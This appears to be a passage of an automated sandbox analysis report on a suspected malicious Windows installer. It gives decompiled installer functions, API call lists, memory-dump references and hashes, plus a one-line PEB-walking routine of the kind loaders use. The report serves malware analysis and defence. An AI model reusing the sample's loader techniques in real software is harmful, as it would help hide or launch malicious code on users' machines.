                                                              0x004054bf
                                                              0x004054c2
                                                              0x004054c5
                                                              0x004054c8
                                                              0x004054cb
                                                              0x004054cc
                                                              0x004054cd
                                                              0x004054e6
                                                              0x004054e9
                                                              0x004054f3
                                                              0x00405502
                                                              0x0040550a
                                                              0x00405512
                                                              0x00405517
                                                              0x0040551a
                                                              0x00405526
                                                              0x0040552f
                                                              0x00405538
                                                              0x0040555a
                                                              0x00405560
                                                              0x00405571
                                                              0x00405576
                                                              0x00405584
                                                              0x00405592
                                                              0x00405592
                                                              0x00405597
                                                              0x004055a5
                                                              0x004055a5
                                                              0x004055aa
                                                              0x004055ad
                                                              0x004055b2
                                                              0x004055be
                                                              0x004055c7
                                                              0x004055d4
                                                              0x004055e3
                                                              0x004055d6
                                                              0x004055db
                                                              0x004055db
                                                              0x004055ef
                                                              0x004055ef
                                                              0x00405603
                                                              0x0040560c
                                                              0x00405615
                                                              0x00405625
                                                              0x00405631
                                                              0x00405631
                                                              0x00000000

                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 004054EC
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004054FB
                                                              • GetClientRect.USER32 ref: 00405538
                                                              • GetSystemMetrics.USER32 ref: 0040553F
                                                              • SendMessageA.USER32 ref: 00405560
                                                              • SendMessageA.USER32 ref: 00405571
                                                              • SendMessageA.USER32 ref: 00405584
                                                              • SendMessageA.USER32 ref: 00405592
                                                              • SendMessageA.USER32 ref: 004055A5
                                                              • ShowWindow.USER32(00000000,?), ref: 004055C7
                                                              • ShowWindow.USER32(?,00000008), ref: 004055DB
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055FC
                                                              • SendMessageA.USER32 ref: 0040560C
                                                              • SendMessageA.USER32 ref: 00405625
                                                              • SendMessageA.USER32 ref: 00405631
                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040550A
                                                                • Part of subcall function 004042E1: SendMessageA.USER32 ref: 004042EF
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040564D
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005421,00000000), ref: 0040565B
                                                              • CloseHandle.KERNEL32(00000000), ref: 00405662
                                                              • ShowWindow.USER32(00000000), ref: 00405685
                                                              • ShowWindow.USER32(?,00000008), ref: 0040568C
                                                              • ShowWindow.USER32(00000008), ref: 004056D2
                                                              • SendMessageA.USER32 ref: 00405706
                                                              • CreatePopupMenu.USER32 ref: 00405717
                                                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040572C
                                                              • GetWindowRect.USER32 ref: 0040574C
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405765
                                                              • SendMessageA.USER32 ref: 004057A1
                                                              • OpenClipboard.USER32(00000000), ref: 004057B1
                                                              • EmptyClipboard.USER32 ref: 004057B7
                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 004057C0
                                                              • GlobalLock.KERNEL32 ref: 004057CA
                                                              • SendMessageA.USER32 ref: 004057DE
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004057F7
                                                              • SetClipboardData.USER32 ref: 00405802
                                                              • CloseClipboard.USER32 ref: 00405808
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: PB
                                                              • API String ID: 590372296-3196168531
                                                              • Opcode ID: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                                              • Instruction ID: 9c2a32fab53b6b0d4bb0e075a5e6b47c54eb8059f7c6cc06f8c9c6988e8d3156
                                                              • Opcode Fuzzy Hash: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                                              • Instruction Fuzzy Hash: 42A16C71A00608BFDB119FA0DE85AAE7BB9FB48354F40403AFA44B61A0CB794E51DF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040473E, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E0040473E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x420528;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405928(0x3fb, _t146);
					E00406503(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405928(0x3fb, _t146);
							if(E00405CAE(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406228(0x41fd20, _t146);
							_t87 = E00406631(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406228(0x41fd20, _t146);
								_t89 = E00405C59(0x41fd20);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41fd20,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41fd20) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41fd20,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C07(0x41fd20);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41fd20) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BD2(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x423f1c; // 0x501c89
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BBA(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41fd10);
									} else {
										E00404AF5(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424804 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042CE(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420d40 == _t158) {
									E00404697();
								}
								 *0x420d40 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420d50;
							_v60 = E00404A8F;
							_v56 = _t146;
							_v68 = E004062BB(_t146, 0x420d50, _t166, 0x420128, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC0(_t146);
								_t125 =  *((intOrPtr*)( *0x424754 + 0x11c));
								if( *((intOrPtr*)( *0x424754 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
									E004062BB(_t146, 0x420d50, _t166, 0, _t125);
									if(lstrcmpiA(0x4236e0, 0x420d50) != 0) {
										lstrcatA(_t146, 0x4236e0);
									}
								}
								 *0x420d40 =  *0x420d40 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C2D(_t146) != 0 && E00405C59(_t146) == 0) {
						E00405BC0(_t146);
					}
					 *0x423f18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042AC(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042AC(_t166);
					E004042E1(_t165);
					_t138 = E00406631(8);
					if(_t138 == 0) {
						L53:
						return E00404313(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                              0x0040473e
                                                              0x00404744
                                                              0x0040474a
                                                              0x00404757
                                                              0x00404765
                                                              0x00404768
                                                              0x00404770
                                                              0x00404776
                                                              0x00404776
                                                              0x00404782
                                                              0x00404785
                                                              0x004047f3
                                                              0x004047fa
                                                              0x004048d1
                                                              0x004048d8
                                                              0x004048e7
                                                              0x004048e7
                                                              0x004048eb
                                                              0x004048f5
                                                              0x00404902
                                                              0x00404904
                                                              0x00404904
                                                              0x00404912
                                                              0x00404919
                                                              0x00404920
                                                              0x00404923
                                                              0x0040495a
                                                              0x0040495c
                                                              0x00404962
                                                              0x00404967
                                                              0x0040496b
                                                              0x0040496d
                                                              0x0040496d
                                                              0x00404989
                                                              0x00000000
                                                              0x0040498b
                                                              0x0040498e
                                                              0x0040499c
                                                              0x004049a2
                                                              0x004049a3
                                                              0x004049a6
                                                              0x004049a9
                                                              0x00000000
                                                              0x004049a9
                                                              0x00404925
                                                              0x00404927
                                                              0x0040492b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040492d
                                                              0x0040492d
                                                              0x0040493a
                                                              0x0040493f
                                                              0x00000000
                                                              0x00000000
                                                              0x00404943
                                                              0x00404945
                                                              0x00404945
                                                              0x0040494d
                                                              0x0040494f
                                                              0x00404952
                                                              0x00404955
                                                              0x00404958
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404958
                                                              0x004049b5
                                                              0x004049bf
                                                              0x004049c2
                                                              0x004049c5
                                                              0x004049cc
                                                              0x004049cc
                                                              0x004049ce
                                                              0x004049ce
                                                              0x004049d3
                                                              0x004049d5
                                                              0x004049dd
                                                              0x004049e4
                                                              0x004049e6
                                                              0x004049f1
                                                              0x004049f1
                                                              0x004049e6
                                                              0x004049f8
                                                              0x00404a01
                                                              0x00404a0b
                                                              0x00404a13
                                                              0x00404a2e
                                                              0x00404a15
                                                              0x00404a1e
                                                              0x00404a1e
                                                              0x00404a13
                                                              0x00404a33
                                                              0x00404a38
                                                              0x00404a3d
                                                              0x00404a46
                                                              0x00404a46
                                                              0x00404a4f
                                                              0x00404a51
                                                              0x00404a51
                                                              0x00404a5d
                                                              0x00404a65
                                                              0x00404a6f
                                                              0x00404a6f
                                                              0x00404a74
                                                              0x00000000
                                                              0x00404a74
                                                              0x00404923
                                                              0x004048da
                                                              0x004048e1
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004048e1
                                                              0x00404800
                                                              0x00404809
                                                              0x00404823
                                                              0x00404828
                                                              0x00404832
                                                              0x00404839
                                                              0x00404845
                                                              0x00404848
                                                              0x0040484b
                                                              0x00404852
                                                              0x0040485a
                                                              0x0040485d
                                                              0x00404861
                                                              0x00404868
                                                              0x00404870
                                                              0x004048ca
                                                              0x00404872
                                                              0x00404873
                                                              0x0040487a
                                                              0x00404884
                                                              0x0040488c
                                                              0x00404899
                                                              0x004048ad
                                                              0x004048b1
                                                              0x004048b1
                                                              0x004048ad
                                                              0x004048b6
                                                              0x004048c3
                                                              0x004048c3
                                                              0x00404870
                                                              0x00000000
                                                              0x00404828
                                                              0x00404816
                                                              0x00000000
                                                              0x00000000
                                                              0x0040481c
                                                              0x00000000
                                                              0x00404787
                                                              0x00404794
                                                              0x0040479d
                                                              0x004047aa
                                                              0x004047aa
                                                              0x004047b1
                                                              0x004047b7
                                                              0x004047c0
                                                              0x004047c3
                                                              0x004047c6
                                                              0x004047ce
                                                              0x004047d1
                                                              0x004047d4
                                                              0x004047da
                                                              0x004047e1
                                                              0x004047e8
                                                              0x00404a7a
                                                              0x00404a8c
                                                              0x004047ee
                                                              0x004047f1
                                                              0x00000000
                                                              0x004047f1
                                                              0x004047e8

                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040478D
                                                              • SetWindowTextA.USER32(00000000,?), ref: 004047B7
                                                              • SHBrowseForFolderA.SHELL32(?,00420128,?), ref: 00404868
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404873
                                                              • lstrcmpiA.KERNEL32(uvlcopdlxoed,00420D50,00000000,?,?), ref: 004048A5
                                                              • lstrcatA.KERNEL32(?,uvlcopdlxoed), ref: 004048B1
                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048C3
                                                                • Part of subcall function 00405928: GetDlgItemTextA.USER32 ref: 0040593B
                                                                • Part of subcall function 00406503: CharNextA.USER32(?), ref: 0040655B
                                                                • Part of subcall function 00406503: CharNextA.USER32(?), ref: 00406568
                                                                • Part of subcall function 00406503: CharNextA.USER32(?), ref: 0040656D
                                                                • Part of subcall function 00406503: CharPrevA.USER32(?,?), ref: 0040657D
                                                              • GetDiskFreeSpaceA.KERNEL32(0041FD20,?,?,0000040F,?,0041FD20,0041FD20,?,00000001,0041FD20,?,?,000003FB,?), ref: 00404981
                                                              • MulDiv.KERNEL32 ref: 0040499C
                                                                • Part of subcall function 00404AF5: lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                                                • Part of subcall function 00404AF5: wsprintfA.USER32 ref: 00404B9B
                                                                • Part of subcall function 00404AF5: SetDlgItemTextA.USER32(?,00420D50), ref: 00404BAE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$C:\Users\user\AppData\Local\Temp$PB$uvlcopdlxoed
                                                              • API String ID: 2624150263-1753744704
                                                              • Opcode ID: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                                              • Instruction ID: 829ad80b7ad659a1b6830b16dd2e7c43b5ac75723c1b4fdd6e47fb9b3f087a68
                                                              • Opcode Fuzzy Hash: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                                              • Instruction Fuzzy Hash: 48A18FB1A00209ABDB11EFA5DD45AAF7BB8EF84314F10843BF601B62D1D77C99418B6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 74%
                                                              			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C2D( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                              0x00402174
                                                              0x0040217e
                                                              0x00402188
                                                              0x00402195
                                                              0x004021a0
                                                              0x004021a3
                                                              0x004021bd
                                                              0x004021c3
                                                              0x004021c9
                                                              0x004021cc
                                                              0x004021d6
                                                              0x004021da
                                                              0x004021da
                                                              0x004021df
                                                              0x004021f0
                                                              0x004021f8
                                                              0x004022d4
                                                              0x004022d4
                                                              0x004022db
                                                              0x004021fe
                                                              0x004021fe
                                                              0x0040220d
                                                              0x00402211
                                                              0x00402214
                                                              0x0040221a
                                                              0x00402228
                                                              0x0040222b
                                                              0x0040222d
                                                              0x00402238
                                                              0x00402238
                                                              0x0040223d
                                                              0x0040223f
                                                              0x00402246
                                                              0x00402246
                                                              0x00402249
                                                              0x00402252
                                                              0x00402255
                                                              0x0040225a
                                                              0x0040225c
                                                              0x00402269
                                                              0x00402269
                                                              0x0040226c
                                                              0x00402278
                                                              0x0040227b
                                                              0x00402284
                                                              0x0040228a
                                                              0x00402291
                                                              0x004022aa
                                                              0x004022ac
                                                              0x004022ba
                                                              0x004022ba
                                                              0x004022aa
                                                              0x004022bd
                                                              0x004022c3
                                                              0x004022c3
                                                              0x004022c6
                                                              0x004022cc
                                                              0x004022d2
                                                              0x004022e7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004022d2
                                                              0x004022dd
                                                              0x00402a5d
                                                              0x00402a69

                                                              APIs
                                                              • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?), ref: 004021F0
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                              • API String ID: 123533781-2935972921
                                                              • Opcode ID: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                                              • Instruction ID: 849b10897e6abda320580ec11bca4de19dcbd678575eb1056a8185fe26502568
                                                              • Opcode Fuzzy Hash: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                                              • Instruction Fuzzy Hash: BC510671A00208AFCB00DFE4C988A9D7BB6EF48314F2045BAF515EB2D1DA799981CB14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 39%
                                                              			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406186(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E00406228();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                              0x004027b9
                                                              0x004027cd
                                                              0x004027d8
                                                              0x004027d9
                                                              0x00402918
                                                              0x004027bb
                                                              0x004027bb
                                                              0x004027bd
                                                              0x004027bf
                                                              0x004027bf
                                                              0x00402a5d
                                                              0x00402a69

                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                                              • Instruction ID: a7d85d328faede53e6a1e3b4f28690110558ed3aa0613785cbf8ce06a9006afe
                                                              • Opcode Fuzzy Hash: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                                              • Instruction Fuzzy Hash: 35F0A771704111EED710EB649A49AEEB7A8DF51314F20067FF112B60C1D7B88946972A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00441872, Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090883971.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                              • Instruction ID: 701d76a6a4fd6a4d1319ff8c2d5159ee4759e0445454fb50b8f1b0a05fb5b2db
                                                              • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                              • Instruction Fuzzy Hash: 52014D78E10208EFDB40DF98C58099DBBF4FB08320F118596E804E7721E334AE509B44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0044165A, Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090883971.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                              • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                              • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                              • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 10001000, Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E10001000() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                              0x10001017

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2092165174.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000004.00000002.2092154979.0000000010000000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2092174189.0000000010002000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2092187739.0000000010004000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
